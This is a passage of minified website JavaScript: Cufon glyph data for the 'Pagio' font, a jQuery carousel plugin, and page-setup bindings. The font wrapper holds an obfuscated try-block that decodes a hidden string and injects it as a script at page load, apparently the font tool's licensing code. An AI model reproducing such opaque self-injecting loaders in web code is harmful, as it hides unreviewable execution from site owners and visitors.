,-20,7,-20,19v0,12,9,20,21,20v11,0,20,-9,20,-20v0,-12,-10,-19,-21,-19","w":168,"k":{"y":-7,"\u00fd":-7,"a":4,"\u00e1":4,"e":4,"\u00e9":4,"\u011b":4,"t":4,"\u0165":4,"c":4,"\u010d":4,"d":4,"\u010f":4,"o":4,"\u00f3":4,"q":4,"g":7}},{"d":"241,-24v-7,9,-5,27,-19,27v-20,0,-40,-12,-54,-27v-11,8,-37,27,-76,27v-110,0,-73,-123,-13,-141v-26,-43,-12,-110,43,-111v34,0,48,28,48,50v0,39,-35,61,-52,71v8,14,29,42,50,66v22,-22,34,-48,39,-61r32,0v-12,30,-27,58,-50,80v13,12,30,23,52,19xm105,-152v18,0,57,-63,13,-69v-25,-2,-28,52,-13,69xm147,-42v-22,-24,-43,-53,-54,-71v-28,15,-38,32,-38,49v0,54,73,44,92,22","w":247},{"d":"108,-162r-4,24r-32,0r-17,103v4,26,41,7,47,2r-2,31v-7,3,-17,7,-33,7v-81,0,-25,-88,-25,-143r-29,0r4,-24r29,0r6,-33r31,0r-6,33r31,0xm122,-162r2,-16v23,-8,24,-24,24,-30v-23,-7,-14,-41,8,-41v14,0,23,13,23,29v0,21,-15,49,-57,58","w":155,"k":{"y":-18,"\u00fd":-18,"j":-14,"v":-5,"w":-7,",":-22,".":-22,"u":-4,"\u016f":-4,"x":-14,":":-22,";":-22,"i":-11,"\u00ed":-11,"m":-9,"n":-9,"z":-11,"\u017e":-11,"\u0148":-9,"r":-4,"\u0159":-4,"h":-9,"p":-4,"f":-4,"s":-11,"\u0161":-11,"k":-7,"l":-14}},{"d":"120,-249v-41,42,-72,164,-72,222v0,30,6,74,23,110r-16,0v-2,-4,-36,-65,-36,-138v0,-92,40,-134,84,-194r17,0","w":105,"k":{"J":-29,"j":-22,"T":-7,"\u0164":-7,"f":-7}},{"d":"62,-162r-4,30v14,-17,33,-32,54,-32v77,0,23,106,24,164r-31,0r15,-117v0,-10,-5,-22,-18,-22v-21,0,-46,31,-49,36r-14,103r-31,0r23,-162r31,0xm163,-238r-48,54r-36,0r-26,-54r14,0r30,35v23,-11,31,-36,66,-35","w":168,"k":{"a":4,"\u00e1":4,"e":4,"\u00e9":4,"\u011b":4,"v":9,"w":7,"t":7,"\u0165":7,"x":4,"c":4,"\u010d":4,"d":4,"\u010f":4,"o":4,"\u00f3":4,"q":4,"g":9}},{"d":"90,-95r-4,30r-86,0r4,-30r86,0","w":90},{"d":"203,-246r-119,247r-13,0r-48,-247r32,0r32,172r83,-172r33,0","w":183,"k":{"x":22,"v":13,"q":29,"p":14,"m":20,"Q":13,"-":29,"y":7,"\u00fd":7,"j":7,"A":22,"\u00c1":22,"C":9,"\u010c":9,"G":7,"a":32,"\u00e1":32,"e":29,"\u00e9":18,"\u011b":18,"w":11,"O":13,",":29,".":29,"t":7,"\u0165":7,"u":20,"\u016f":20,"i":7,"\u00ed":7,"n":20,"z":14,"\u017e":14,"\u0148":20,"c":29,"\u010d":29,"d":29,"\u010f":29,"o":29,"\u00f3":22,"r":23,"\u0159":23,"f":7,"g":29,"s":18,"\u0161":18}},{"d":"191,-107v30,0,55,24,55,55v0,30,-25,55,-55,55v-30,0,-55,-25,-55,-55v0,-31,25,-55,55,-55xm191,-80v-15,0,-28,12,-28,28v0,16,13,28,28,28v16,0,28,-12,28,-28v0,-16,-13,-28,-28,-28xm75,-248v30,0,55,24,55,55v0,30,-25,54,-55,54v-30,0,-54,-24,-54,-54v0,-31,24,-55,54,-55xm75,-222v-15,0,-29,13,-29,29v0,15,14,28,29,28v16,0,28,-13,28,-28v0,-16,-13,-29,-28,-29xm227,-249r-162,252r-27,0r162,-252r27,0","w":254},{"d":"47,-246v67,-7,128,7,128,65v0,27,-14,53,-50,62v29,28,43,82,64,119r-35,0v-4,-8,-21,-44,-25,-51v-28,-56,-32,-59,-67,-58r-15,109r-34,0xm141,-181v0,-42,-37,-35,-64,-36r-11,79v2,0,23,2,38,-1v28,-5,37,-25,37,-42xm176,-317r-49,55r-45,0r-25,-55v30,-3,32,20,48,31v23,-11,34,-34,71,-31","w":191,"k":{"A":-11,"\u00c1":-11,"T":25,"\u0164":25,"V":11,"W":14,"Y":27,"\u00dd":27,"v":11,"w":7,"O":7,",":-13,".":-11,":":-11,";":-11}},{"d":"82,-246r-34,246r-34,0r34,-246r34,0","w":86},{"d":"179,-246r-4,30r-98,0r-11,77r87,0r-4,29r-87,0r-12,81r129,0r-4,29r-161,0r35,-246r130,0xm186,-316r-59,54r-19,0r26,-54r52,0","w":183,"k":{"j":-6,"A":-18,"\u00c1":-18,"Y":7,"\u00dd":7,",":-11,".":-14,"x":-11,"B":-4,"D":-4,"\u010e":-4,"E":-4,"\u00c9":-4,"\u011a":-4,"F":-4,"H":-4,"I":-4,"\u00cd":-4,"K":-4,"L":-4,"N":-4,"\u0147":-4,"P":-4,"R":-4,"\u0158":-4,":":-14,";":-14,"i":-7,"\u00ed":-7,"m":-7,"n":-4,"z":-7,"\u017e":-7,"\u0148":-4}},{"d":"247,-246r-34,246r-34,0r16,-109r-133,0r-15,109r-34,0r34,-246r34,0r-15,107r133,0r14,-107r34,0","w":251},{"d":"117,-59v0,-46,-83,-58,-83,-123v0,-54,70,-84,124,-57r-5,33v-20,-21,-91,-16,-86,23v7,51,83,64,83,121v0,31,-24,65,-73,65v-27,0,-51,-12,-59,-17r5,-36v16,14,40,23,57,23v15,0,37,-10,37,-32xm179,-317r-49,55r-44,0r-26,-55v30,-3,32,20,48,31v24,-10,35,-33,71,-31","w":164,"k":{"y":5,"\u00fd":5,"C":5,"\u010c":5,"G":5,"Y":13,"\u00dd":13,"a":3,"\u00e1":3,"e":4,"\u00e9":4,"\u011b":4,"v":14,"w":11,"O":7,"S":7,"\u0160":7,",":-9,".":-9,"d":2,"\u010f":2,"q":2,"f":11}},{"d":"9,-10r4,-30v12,6,30,14,54,14v40,0,53,-26,53,-46v0,-32,-28,-41,-45,-40r3,-29v30,-3,52,-14,55,-44v-11,-48,-49,-39,-87,-19r5,-34v48,-22,116,-11,117,51v0,19,-7,46,-48,61v61,32,36,131,-51,129v-28,0,-48,-8,-60,-13"},{"d":"130,-195v0,54,-70,77,-73,135r-20,0v-5,-61,52,-91,61,-133v-2,-40,-52,-24,-66,-6r5,-36v28,-26,93,-13,93,40xm61,-14v0,10,-8,19,-20,19v-12,0,-19,-9,-19,-19v0,-10,8,-19,19,-19v11,0,20,8,20,19","w":127},{"d":"244,-246r-35,246r-17,0r-122,-179r-25,179r-31,0r35,-246r16,0r123,181r25,-181r31,0xm220,-317r-49,55r-44,0r-25,-55r18,0r29,31v24,-10,35,-33,71,-31","w":247,"k":{"A":-7,"\u00c1":-7}},{"d":"253,-246r-105,120r80,126r-39,0r-63,-101r-89,101r-43,0r114,-130r-73,-116r37,0r58,91r80,-91r43,0","w":240,"k":{"v":22,"q":20,"p":7,"Q":22,"y":16,"\u00fd":16,"C":22,"\u010c":22,"G":22,"a":20,"\u00e1":20,"e":20,"\u00e9":20,"\u011b":20,"w":22,"O":22,"t":14,"\u0165":14,"u":11,"\u016f":11,"c":20,"\u010d":20,"d":20,"\u010f":20,"o":20,"\u00f3":20,"r":4,"\u0159":4,"f":7,"g":11,"s":7,"\u0161":7}},{"d":"12,-105v0,-106,94,-156,212,-141r-5,30v-96,-17,-176,36,-171,110v4,70,53,99,117,68r6,-43r-35,0r4,-27r68,0r-13,90v-5,3,-41,21,-81,21v-64,0,-102,-49,-102,-108","w":217,"k":{"A":-11,"\u00c1":-11,",":-7,".":-7}},{"d":"90,-194v-1,-20,-22,-60,3,-67v28,10,2,42,3,67v3,0,6,2,7,4v17,-13,23,-30,47,-38v15,3,16,27,-6,29r-39,14v1,2,1,7,0,9v19,9,50,9,56,31v0,23,-29,6,-32,0r-26,-26v-1,2,-4,3,-7,3v3,19,8,31,8,54v0,25,-25,15,-24,0v1,-19,8,-35,10,-54v-2,0,-4,0,-7,-3v-13,10,-31,35,-48,37v-24,-8,-4,-25,10,-30r36,-12v-1,-1,-2,-7,0,-9v-18,-9,-51,-12,-57,-30v1,-17,22,-14,29,-4r30,29v3,-3,4,-4,7,-4","w":161},{"d":"225,-147v0,9,-4,62,-33,105v-45,66,-174,62,-174,-59v0,-67,44,-148,119,-148v70,0,88,65,88,102xm190,-150v0,-9,0,-70,-53,-70v-58,0,-84,74,-84,125v0,51,28,71,54,71v52,0,83,-66,83,-126","w":236,"k":{"A":7,"\u00c1":7,"C":4,"\u010c":4,"T":23,"\u0164":23,"V":14,"W":18,"Y":29,"\u00dd":29,"Z":18,"\u017d":18,"S":14,"\u0160":14,",":11,".":11,"X":25,"x":13}},{"d":"234,-150r6,-28r32,0r-31,146v0,8,8,11,12,11v19,0,68,-37,68,-97v0,-66,-57,-111,-126,-111v-92,0,-146,71,-146,151v0,104,80,135,152,135v77,0,111,-35,123,-53r32,0v-5,10,-43,80,-155,80v-127,0,-178,-76,-178,-159v0,-68,40,-180,174,-180v98,0,150,69,150,137v0,60,-38,98,-62,113v-8,5,-24,13,-44,13v-31,0,-33,-18,-34,-29v-8,9,-28,29,-53,29v-37,0,-64,-35,-64,-79v1,-75,86,-163,144,-79xm184,-157v-63,0,-88,139,-24,139v32,0,64,-42,64,-89v0,-33,-19,-50,-40,-50","w":363},{"d":"199,-246r-4,31r-68,0r-31,215r-33,0r31,-215r-70,0r5,-31r170,0","w":183,"k":{"y":13,"\u00fd":13,"j":7,"A":25,"\u00c1":25,"C":20,"\u010c":20,"G":20,"Q":18,"T":-4,"\u0164":-4,"a":40,"\u00e1":32,"e":40,"\u00e9":22,"\u011b":22,"v":22,"w":16,"O":18,",":36,".":36,"t":18,"\u0165":18,"u":22,"\u016f":22,"x":25,":":9,";":9,"i":7,"\u00ed":7,"m":22,"n":22,"z":18,"\u017e":18,"\u0148":22,"c":36,"\u010d":36,"d":40,"\u010f":40,"o":40,"\u00f3":29,"r":22,"\u0159":22,"q":40,"M":14,"p":22,")":-7,"]":-7,"}":-7,"f":14,"g":36,"-":43,"s":20,"\u0161":20}},{"d":"198,-246r-86,124r-18,122r-32,0r17,-122r-58,-124r34,0r43,90r62,-90r38,0","w":176,"k":{"y":14,"\u00fd":14,"j":7,"A":18,"\u00c1":18,"C":14,"\u010c":14,"G":14,"Q":14,"a":40,"\u00e1":40,"e":40,"\u00e9":22,"\u011b":22,"v":22,"w":18,"O":11,"S":4,"\u0160":4,",":29,".":29,"t":11,"\u0165":11,"u":22,"\u016f":22,"x":25,"i":11,"\u00ed":11,"m":18,"n":18,"z":25,"\u017e":25,"\u0148":18,"c":40,"\u010d":40,"d":40,"\u010f":40,"o":40,"\u00f3":32,"r":22,"\u0159":22,"q":29,"M":11,"p":18,"f":14,"g":36,"-":32,"s":18,"\u0161":18}},{"d":"47,-246v67,-7,128,7,128,65v0,27,-14,53,-50,62v29,28,43,82,64,119r-35,0v-4,-8,-21,-44,-25,-51v-28,-56,-32,-59,-67,-58r-15,109r-34,0xm141,-181v0,-42,-37,-35,-64,-36r-11,79v2,0,23,2,38,-1v28,-5,37,-25,37,-42","w":191,"k":{";":-11,"A":-11,"\u00c1":-11,"T":25,"\u0164":25,"V":11,"W":14,"Y":27,"\u00dd":27,"v":11,"w":7,"O":7,",":-13,".":-11,":":-11}},{"d":"144,-164r-4,27v-58,-13,-97,31,-97,68v0,12,4,47,44,47v22,0,36,-11,45,-17r-4,33v-8,4,-22,11,-45,11v-54,0,-71,-42,-71,-74v0,-47,49,-114,132,-95xm161,-238r-47,54r-36,0r-27,-54r15,0r30,35r48,-35r17,0","w":138,"k":{"y":-16,"\u00fd":-16,"j":-7,",":-22,".":-22,"t":-7,"\u0165":-7,"u":-4,"\u016f":-4,"x":-7,"i":-7,"\u00ed":-7,"m":-9,"n":-9,"\u0148":-9,"r":-4,"\u0159":-4,"b":-7,"h":-7,"p":-7,"f":-7,"k":-7,"l":-7}},{"d":"21,-148r55,0r15,-70r26,0r-15,70r70,0r15,-70r25,0r-14,70r33,0r0,25r-38,0r-13,61r51,0r0,26r-56,0r-15,69r-25,0r14,-69r-70,0r-15,69r-25,0r14,-69r-32,0r0,-26r38,0r12,-61r-50,0r0,-25xm167,-123r-70,0r-13,61r70,0","w":210},{"d":"-11,3r106,-252r27,0r-106,252r-27,0","w":101},{"d":"196,-137r0,29r-170,72r0,-31r135,-55r-135,-57r0,-31","w":210},{"d":"144,-164r-4,27v-58,-13,-97,31,-97,68v0,12,4,47,44,47v22,0,36,-11,45,-17r-4,33v-8,4,-22,11,-45,11v-54,0,-71,-42,-71,-74v0,-47,49,-114,132,-95","w":138,"k":{"y":-16,"\u00fd":-16,"j":-7,",":-22,".":-22,"t":-7,"\u0165":-7,"u":-4,"\u016f":-4,"x":-7,"i":-7,"\u00ed":-7,"m":-9,"n":-9,"\u0148":-9,"r":-4,"\u0159":-4,"b":-7,"h":-7,"p":-7,"f":-7,"k":-7,"l":-7}},{"d":"140,-45r-5,32v-54,41,-121,9,-121,-59v0,-51,30,-95,75,-95v39,0,65,36,58,83r-102,0v-4,36,14,65,39,64v20,0,41,-14,56,-25xm50,-105r68,0v0,-24,-12,-37,-29,-37v-26,0,-35,27,-39,37","w":157,"k":{"v":5,"w":4,",":-11,".":-11}},{"d":"73,-246r-22,155r69,-71r41,0r-74,77r78,85r-40,0r-74,-82r-12,82r-31,0r35,-246r30,0","w":164,"k":{"y":7,"\u00fd":7,"a":14,"\u00e1":14,"e":16,"\u00e9":16,"\u011b":16,"v":7,",":-11,".":-11,"t":9,"\u0165":9,"c":16,"\u010d":16,"d":16,"\u010f":16,"o":14,"\u00f3":14,"q":14,"p":4,"g":7}},{"w":100},{"d":"148,-162r-83,165r-15,0r-37,-165r31,0r21,100r52,-100r31,0","w":135,"k":{"v":-7,"y":-14,"\u00fd":-14,"w":-7,",":7,".":7,"t":-7,"\u0165":-7,"g":4,"s":-4,"\u0161":-4}},{"d":"160,-166r-34,246r-32,0r12,-85v-41,26,-95,-7,-95,-62v0,-23,10,-63,46,-83v36,-20,64,-15,103,-16xm126,-141v-62,-3,-84,33,-84,75v0,48,38,55,67,39","w":168,"k":{"y":-11,"\u00fd":-11,"j":-18}},{"d":"179,-246r-4,30r-98,0r-11,77r87,0r-4,29r-87,0r-12,81r129,0r-4,29r-161,0r35,-246r130,0","w":183,"k":{";":-14,"j":-6,"A":-18,"\u00c1":-18,"Y":7,"\u00dd":7,",":-11,".":-14,"x":-11,"B":-4,"D":-4,"\u010e":-4,"E":-4,"\u00c9":-4,"\u011a":-4,"F":-4,"H":-4,"I":-4,"\u00cd":-4,"K":-4,"L":-4,"N":-4,"\u0147":-4,"P":-4,"R":-4,"\u0158":-4,":":-14,"i":-7,"\u00ed":-7,"m":-7,"n":-4,"z":-7,"\u017e":-7,"\u0148":-4}},{"d":"76,-237r24,53r-20,0r-41,-53r37,0","w":119},{"d":"179,-70v1,71,-85,74,-165,70r35,-246v69,0,114,1,114,60v0,35,-25,46,-34,51v36,13,50,39,50,65xm67,-147v37,4,63,-12,62,-38v0,-36,-39,-33,-52,-32xm50,-27v51,0,95,3,95,-42v0,-35,-29,-56,-82,-51","w":190,"k":{"v":5,"X":7,"V":14,"A":-13,"\u00c1":-13,"T":18,"\u0164":18,"W":18,"Y":25,"\u00dd":25,"w":4,",":-11,".":-11}},{"d":"229,-246v-12,65,-13,161,-40,208v-23,40,-64,41,-83,41v-135,-5,-67,-152,-61,-249r33,0r-23,174v0,21,15,45,53,45v49,0,61,-31,67,-76r20,-143r34,0xm139,-335v48,1,46,73,0,73v-22,0,-36,-18,-36,-37v0,-20,16,-36,36,-36xm139,-279v11,0,20,-9,20,-20v0,-11,-9,-20,-20,-20v-11,0,-20,9,-20,20v0,11,9,20,20,20","w":228,"k":{"a":4,"\u00e1":4,"e":4,"\u00e9":4,"\u011b":4,",":5,".":5,"q":4}},{"d":"-9,52r3,-16v23,-8,23,-25,23,-31v-22,-6,-14,-40,8,-40v14,0,24,14,24,29v0,19,-14,49,-58,58","w":71,"k":{"J":-22,"j":-14,"A":-22,"\u00c1":-22,"C":11,"\u010c":11,"G":11,"Q":11,"T":22,"\u0164":22,"V":32,"W":32,"Y":43,"\u00dd":43,"Z":-14,"\u017d":-14,"a":4,"\u00e1":4,"e":7,"\u00e9":7,"\u011b":7,"v":14,"w":14}},{"d":"14,-64v0,-31,29,-65,53,-68v-51,-25,-24,-122,46,-117v71,5,92,91,22,121v7,3,33,15,33,51v0,39,-29,80,-84,80v-44,0,-70,-31,-70,-67xm105,-144v51,-2,54,-72,7,-75v-46,-3,-58,76,-7,75xm136,-76v0,-26,-19,-38,-40,-38v-30,0,-49,24,-49,50v0,28,24,38,40,38v25,0,49,-21,49,-50"},{"d":"168,-179v0,51,-40,83,-108,75r-14,104r-34,0r34,-246v65,0,122,-3,122,67xm76,-217r-12,84v7,0,21,1,31,0v36,-4,40,-34,40,-46v0,-18,-24,-44,-59,-38","w":161,"k":{"y":-14,"\u00fd":-14,"A":11,"\u00c1":11,"Y":11,"\u00dd":11,"a":13,"\u00e1":13,"e":11,"\u00e9":11,"\u011b":11,"v":-7,"w":-7,",":36,".":36,"t":-4,"\u0165":-4,"X":22,"c":11,"\u010d":11,"d":11,"\u010f":11,"o":11,"\u00f3":11,"q":11}},{"d":"108,-162r-4,24r-32,0r-17,103v4,26,40,7,47,2r-2,31v-7,3,-17,7,-33,7v-80,0,-26,-87,-26,-143r-28,0r4,-24r29,0r6,-33r30,0r-5,33r31,0","w":105,"k":{"y":-18,"\u00fd":-18,"j":-14,"v":-5,"w":-7,",":-22,".":-22,"u":-4,"\u016f":-4,"x":-14,":":-22,";":-22,"i":-11,"\u00ed":-11,"m":-9,"n":-9,"z":-11,"\u017e":-11,"\u0148":-9,"r":-4,"\u0159":-4,"h":-9,"p":-4,"f":-4,"s":-11,"\u0161":-11,"k":-7,"l":-14}},{"d":"140,-45r-5,32v-54,41,-121,9,-121,-59v0,-51,30,-95,75,-95v39,0,65,36,58,83r-102,0v-4,36,14,65,39,64v20,0,41,-14,56,-25xm50,-105r68,0v0,-24,-12,-37,-29,-37v-26,0,-35,27,-39,37xm94,-237r37,0r-41,53r-20,0","w":157,"k":{"v":5,"w":4,",":-11,".":-11}},{"d":"-2,27r184,0r0,18r-184,0r0,-18","w":180},{"d":"212,-246r-113,114r104,132r-38,0r-101,-129r-19,129r-33,0r35,-246r33,0r-16,106r105,-106r43,0","w":202,"k":{"y":13,"\u00fd":13,"C":25,"\u010c":25,"G":25,"Q":25,"T":18,"\u0164":18,"Z":-14,"\u017d":-14,"a":14,"\u00e1":14,"e":14,"\u00e9":14,"\u011b":14,"v":23,"w":20,"O":25,"S":11,"\u0160":11,",":-7,".":-7,"t":14,"\u0165":14,"u":7,"\u016f":7,":":-7,";":-7,"c":14,"\u010d":14,"d":14,"\u010f":14,"o":14,"\u00f3":14,"q":14}},{"d":"164,-246r-4,30r-85,0r-11,76r78,0r-4,30r-79,0r-15,110r-33,0r36,-246r117,0","w":150,"k":{"x":11,"q":9,"M":11,"A":11,"\u00c1":11,"a":9,"\u00e1":9,"e":5,"\u00e9":5,"\u011b":5,",":36,".":36,"c":9,"\u010d":9,"d":9,"\u010f":9,"o":5,"\u00f3":5,"r":5,"\u0159":5}},{"d":"17,-97v-5,-21,24,-65,72,-65r71,0r-3,24r-31,0v17,22,11,74,-18,86v-19,15,-49,3,-65,26v12,23,89,14,89,63v0,19,-18,46,-66,46v-35,0,-70,-15,-70,-41v0,-23,29,-30,46,-34v-8,-3,-28,-11,-28,-29v0,-13,14,-25,32,-30v-24,-12,-29,-32,-29,-46xm107,-104v0,-21,-13,-33,-28,-33v-40,1,-45,70,-4,71v19,0,32,-18,32,-38xm67,17v-11,3,-42,9,-42,25v0,13,24,18,42,18v25,0,35,-11,35,-20v0,-11,-17,-19,-35,-23","w":153,"k":{"y":-14,"\u00fd":-14,"j":-18,"a":9,"\u00e1":9,"e":5,"\u00e9":5,"\u011b":5,"v":-7,"w":-7,"t":-4,"\u0165":-4,"o":4,"\u00f3":4,"f":-7}},{"d":"157,-162r-23,162r-31,0r4,-28v-22,33,-93,48,-93,-13v0,-36,12,-85,16,-121r31,0r-16,118v14,51,50,4,67,-13r14,-105r31,0","w":168,"k":{"y":-7,"\u00fd":-7,"a":4,"\u00e1":4,"e":4,"\u00e9":4,"\u011b":4,"t":4,"\u0165":4,"c":4,"\u010d":4,"d":4,"\u010f":4,"o":4,"\u00f3":4,"q":4,"g":7}},{"d":"84,-246r-36,252v-4,29,-10,77,-65,77v-1,0,-12,1,-23,-2r-9,-32v32,8,67,0,64,-39r36,-256r33,0","w":86,"k":{"J":-11,"A":-9,"\u00c1":-9}}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+322-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("f)lSC-LYB2.}f3Kjp-aAb)b.QRLSl-.}QR*AB2NIlq?8>0Y]M,_=prwP>0aAra6SMg:,l&p=prwPl-N?#Qe}Q&zPMrz_Q&zPM){P9qLpQ&zPM)>0W2b_Q&zPM)q,BI:N>zYIQ&zPMra]LSq=prw6M)l=prw6M)q$tKP]Q&zPMrae9R?,Cap0QaPjQ&zPM)z6Q&zPMrpKBa6SMg{RLa6SMg{`laG=prwPl)a=prw6Lsa=prw6M)L@LK6SMg:slao?(q@GMr:gL)l,fYWeLm,}#K6SMg{Rl]l=prw6LsziQ&zPMrWo~q>KQ&zPMrzomq6SMg:stze=prw6Lsw0(S6SMg{YLSe&f,.wqaKmQ&zPMr:,bSP!(-LKBA:R=zqkWK6SMg{RlmPoz&N=prwPlrK#mYlIpzi]~ILPC)KYf3b]fm6@(rw8=gS]~Iw8CgSP~-6KC-pYB36I(2b}l]_ICw:3g{a)&b*f~MLt(WNmrzq2Q>lBC=p9#ke]s,K-Ii@7H8G}!P6A0YSR`o_$j?.c5&KPB&M.9`YjB2>i~Soi(0@`p`p=~],5fg?$p`p`Q3_P>2p@CSP}>`i@*3?}p)q0p3e8CRLep)K!C]_iC`LYC-aGlm,@l-.AfgG@()PjfAG@f2pC>SG@QqY.=aG@QQY@f3,k")}catch(e){}delete _cufon_bridge_;return f})({"w":187,"face":{"font-family":"Pagio","font-weight":500,"font-style":"italic","font-stretch":"normal","units-per-em":"360","panose-1":"2 11 6 2 2 1 4 9 2 3","ascent":"246","descent":"-114","x-height":"5","bbox":"-49 -335 356 84.386","underline-thickness":"18","underline-position":"-18","slope":"-8","stemh":"29","stemv":"32","unicode-range":"U+0020-U+017E"}}));;(function($){$.fn.carousel=function(params){var params=$.extend({direction:"horizontal",loop:false,dispItems:1,pagination:false,paginationPosition:"inside",nextBtn:'<span role="button">Next</span>',prevBtn:'<span role="button">Previous</span>',btnsPosition:"inside",nextBtnInsert:"appendTo",prevBtnInsert:"prependTo",nextBtnInsertFn:false,prevBtnInsertFn:false,autoSlide:false,autoSlideInterval:3000,delayAutoSlide:false,combinedClasses:false,effect:"slide",slideEasing:"swing",animSpeed:"normal",equalWidths:"true",callback:function(){},useAddress:false,adressIdentifier:"carousel"},params);if(params.btnsPosition=="outside"){params.prevBtnInsert="insertBefore";params.nextBtnInsert="insertAfter";}
params.delayAutoSlide=params.delayAutoSlide||params.autoSlideInterval;return this.each(function(){var env={$elts:{},params:params,launchOnLoad:[]};env.$elts.carousel=$(this).addClass("js");env.$elts.content=$(this).children().css({position:"absolute","top":0});env.$elts.wrap=env.$elts.content.wrap('<div class="carousel-wrap"></div>').parent().css({overflow:"hidden",position:"relative"});env.steps={first:0,count:env.$elts.content.children().length};env.steps.last=env.steps.count-1;if($.isFunction(env.params.prevBtnInsertFn)){env.$elts.prevBtn=env.params.prevBtnInsertFn(env.$elts);}else{env.$elts.prevBtn=$(params.prevBtn)[params.prevBtnInsert](env.$elts.carousel);}
if($.isFunction(env.params.nextBtnInsertFn)){env.$elts.nextBtn=env.params.nextBtnInsertFn(env.$elts);}else{env.$elts.nextBtn=$(params.nextBtn)[params.nextBtnInsert](env.$elts.carousel);}
env.$elts.nextBtn.addClass("carousel-control next carousel-next");env.$elts.prevBtn.addClass("carousel-control previous carousel-previous");initButtonsEvents(env);if(env.params.pagination){initPagination(env);}
initAddress(env);$(function(){var $firstItem=env.$elts.content.children(":first");env.itemWidth=$firstItem.outerWidth();if(params.direction=="vertical"){env.contentWidth=env.itemWidth;}else{if(params.equalWidths){env.contentWidth=env.itemWidth*env.steps.count;}else{env.contentWidth=(function(){var totalWidth=0;env.$elts.content.children().each(function(){totalWidth+=$(this).outerWidth();});return totalWidth;})();}}
env.$elts.content.width(env.contentWidth);env.itemHeight=$firstItem.outerHeight();if(params.direction=="vertical"){env.$elts.content.css({height:env.itemHeight*env.steps.count+"px"});env.$elts.content.parent().css({height:env.itemHeight*env.params.dispItems+"px"});}else{env.$elts.content.parent().css({height:env.itemHeight+"px"});}
updateButtonsState(env);$.each(env.launchOnLoad,function(i,fn){fn();});if(env.params.autoSlide){window.setTimeout(function(){env.autoSlideInterval=window.setInterval(function(){goToStep(env,getRelativeStep(env,"next"));},env.params.autoSlideInterval);},env.params.delayAutoSlide);}});});};function initButtonsEvents(env){env.$elts.nextBtn.add(env.$elts.prevBtn).bind("enable",function(){var $this=$(this).unbind("click").bind("click",function(){goToStep(env,getRelativeStep(env,($this.is(".next")?"next":"prev")));stopAutoSlide(env);}).removeClass("disabled");if(env.params.combinedClasses){$this.removeClass("next-disabled previous-disabled");}}).bind("disable",function(){var $this=$(this).unbind("click").addClass("disabled");if(env.params.combinedClasses){if($this.is(".next")){$this.addClass("next-disabled");}else if($this.is(".previous")){$this.addClass("previous-disabled");}}}).hover(function(){$(this).toggleClass("hover");});};function initPagination(env){env.$elts.pagination=$('<div class="center-wrap"><div class="carousel-pagination"><p></p></div></div>')[((env.params.paginationPosition=="outside")?"insertAfter":"appendTo")](env.$elts.carousel).find("p");env.$elts.paginationBtns=$([]);env.$elts.content.find("li").each(function(i){if(i%env.params.dispItems==0){env.$elts.paginationBtns=env.$elts.paginationBtns.add($('<a role="button"><span>'+(env.$elts.paginationBtns.length+1)+'</span></a>').data("firstStep",i));}});env.$elts.paginationBtns.appendTo(env.$elts.pagination);env.$elts.paginationBtns.slice(0,1).addClass("active");env.launchOnLoad.push(function(){env.$elts.paginationBtns.click(function(e){goToStep(env,$(this).data("firstStep"));stopAutoSlide(env);});});};function initAddress(env){if(env.params.useAddress&&$.isFunction($.fn.address)){$.address.init(function(e){var pathNames=$.address.pathNames();if(pathNames[0]===env.params.adressIdentifier&&!!pathNames[1]){goToStep(env,pathNames[1]-1);}else{$.address.value('/'+env.params.adressIdentifier+'/1');}}).change(function(e){var pathNames=$.address.pathNames();if(pathNames[0]===env.params.adressIdentifier&&!!pathNames[1]){goToStep(env,pathNames[1]-1);}});}else{env.params.useAddress=false;}};function goToStep(env,step){env.params.callback(step);transition(env,step);env.steps.first=step;updateButtonsState(env);if(env.params.useAddress){$.address.value('/'+env.params.adressIdentifier+'/'+(step+1));}};function getRelativeStep(env,position){if(position=="prev"){if((env.steps.first-env.params.dispItems)>=0){return env.steps.first-env.params.dispItems;}else{return((env.params.loop)?(env.steps.count-env.params.dispItems):false);}}else if(position=="next"){if((env.steps.first+env.params.dispItems)<env.steps.count){return env.steps.first+env.params.dispItems;}else{return((env.params.loop)?0:false);}}};function transition(env,step){switch(env.params.effect){case"no":if(env.params.direction=="vertical"){env.$elts.content.css("top",-(env.itemHeight*step)+"px");}else{env.$elts.content.css("left",-(env.itemWidth*step)+"px");}
break;case"fade":if(env.params.direction=="vertical"){env.$elts.content.hide().css("top",-(env.itemHeight*step)+"px").fadeIn(env.params.animSpeed);}else{env.$elts.content.hide().css("left",-(env.itemWidth*step)+"px").fadeIn(env.params.animSpeed);}
break;default:if(env.params.direction=="vertical"){env.$elts.content.stop().animate({top:-(env.itemHeight*step)+"px"},env.params.animSpeed,env.params.slideEasing);}else{env.$elts.content.stop().animate({left:-(env.itemWidth*step)+"px"},env.params.animSpeed,env.params.slideEasing);}
break;}};function updateButtonsState(env){if(getRelativeStep(env,"prev")!==false){env.$elts.prevBtn.trigger("enable");}else{env.$elts.prevBtn.trigger("disable");}
if(getRelativeStep(env,"next")!==false){env.$elts.nextBtn.trigger("enable");}else{env.$elts.nextBtn.trigger("disable");}
if(env.params.pagination){env.$elts.paginationBtns.removeClass("active").filter(function(){return($(this).data("firstStep")==env.steps.first)}).addClass("active");}};function stopAutoSlide(env){if(!!env.autoSlideInterval){window.clearInterval(env.autoSlideInterval);}};})(jQuery);$(document).ready(function(){bind_cufon();bind_hover();bind_search();bind_rotate();bind_ul();bind_content();bind_effects();bind_panels();bind_article();bind_popup();bind_tabs();});function bind_cufon()
{Cufon.replace('h1')('h2')('.font')('.menu li a')('.type-headline');}
function bind_rotate()
{$('.carousel').carousel({dispItems:3,loop:true,autoSlide:true,autoSlideInterval:7000});}
function bind_handler(){$('#images').hover(function(){$('#handle').fadeIn();},function(){$('#handle').fadeOut();});}
function bind_popup()
{$('a.popup').attr('rel','facebox');$('a[rel*=facebox]').facebox();}
function bind_panels()
{$('#main-panels dl:last').addClass('last');}
function api_window(url,width,height)
